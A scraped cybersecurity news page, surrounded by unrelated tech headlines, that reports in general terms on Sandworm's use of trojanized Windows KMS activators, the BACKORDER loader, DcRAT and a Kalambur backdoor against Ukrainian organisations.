![iFixit Tears Down New M4 MacBook Air [Video]](https://www.iclarified.com/images/news/96717/96717/96717-640.jpg)
![Apple Officially Announces Return of 'Ted Lasso' for Fourth Season [Video]](https://www.iclarified.com/images/news/96710/96710/96710-640.jpg)
![[Update: Fix] Chromecast (2nd gen) and Audio can’t Cast in ‘Untrusted’ outage](https://i0.wp.com/9to5google.com/wp-content/uploads/sites/4/2019/08/chromecast_audio_1.jpg?resize=1200%2C628&quality=82&strip=all&ssl=1)
![[The AI Show Episode 139]: The Government Knows AGI Is Coming, Superintelligence Strategy, OpenAI’s $20,000 Per Month Agents & Top 100 Gen AI Apps](https://www.marketingaiinstitute.com/hubfs/ep%20139%20cover-2.png)
![[The AI Show Episode 138]: Introducing GPT-4.5, Claude 3.7 Sonnet, Alexa+, Deep Research Now in ChatGPT Plus & How AI Is Disrupting Writing](https://www.marketingaiinstitute.com/hubfs/ep%20138%20cover.png)
![If I use an API licensed with apache 2.0 in my project, what license do I use and what should I be aware of? [closed]](https://cdn.sstatic.net/Sites/softwareengineering/Img/apple-touch-icon@2.png?v=1ef7363febba)
.jpg?#)
.jpg?#)
Russian Hackers Leverages Weaponized Microsoft Key Management Service (KMS) To Hack Windows Systems
Russian-backed hackers, specifically the Sandworm APT group (also known as APT44 or UAC-0145), have been using weaponized Microsoft Key Management Service (KMS) activators to infiltrate Windows systems in Ukraine. This campaign, which has been active since late 2023, exploits pirated KMS tools and fake Windows updates to distribute malware, further destabilizing Ukraine’s critical infrastructure. The […] The post Russian Hackers Leverages Weaponized Microsoft Key Management Service (KMS) To Hack Windows Systems appeared first on Cyber Security News.
 To Hack Windows Systems.webp?#)
Russian-backed hackers, specifically the Sandworm APT group (also known as APT44 or UAC-0145), have been using weaponized Microsoft Key Management Service (KMS) activators to infiltrate Windows systems in Ukraine.
This campaign, which has been active since late 2023, exploits pirated KMS tools and fake Windows updates to distribute malware, further destabilizing Ukraine’s critical infrastructure.
The Sandworm group, affiliated with Russia’s Main Intelligence Directorate (GRU), has been targeting Ukrainian organizations for over a decade.
Since the full-scale invasion, their attacks have intensified, with a focus on state bodies and critical infrastructure.
While security experts at SOC Prime detected that this group is known for refining its tactics in Ukraine before deploying them globally.
Attack Chain
Attackers are using Trojanized KMS activators, such as “KMSAuto++x64_v1.8.4.zip,” disguised as legitimate activation tools to target users bypassing Windows licensing.
These malicious files, often spread through torrent sites and Ukrainian-speaking forums, initiate an infection chain when executed.
The process begins with deploying BACKORDER, a loader that disables Windows Defender and leverages Living Off the Land Binaries (LOLBINs) to evade detection.
BACKORDER then delivers the final payload, DarkCrystal RAT (DcRAT), which connects to a Command and Control (C2) server to exfiltrate sensitive data while maintaining persistence via scheduled tasks and elevated processes.
To further ensure long-term access, the malware creates scheduled tasks and blends into legitimate system processes.
Additionally, researchers have identified a new backdoor named Kalambur, which is distributed through a typosquatted domain masquerading as a Windows Update.
Kalambur downloads a repackaged TOR binary and other attacker-controlled tools, further expanding the threat landscape.
To combat these threats, security teams can utilize Sigma rules and detection tools compatible with multiple security analytics solutions.
These tools are mapped to the MITRE ATT\&CK framework and provide extensive metadata for threat intelligence and triage recommendations.
As these tactics continue to refine and spread, it is crucial for organizations to stay informed and utilize advanced threat detection tools to protect against such sophisticated attacks.
Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free
The post Russian Hackers Leverages Weaponized Microsoft Key Management Service (KMS) To Hack Windows Systems appeared first on Cyber Security News.
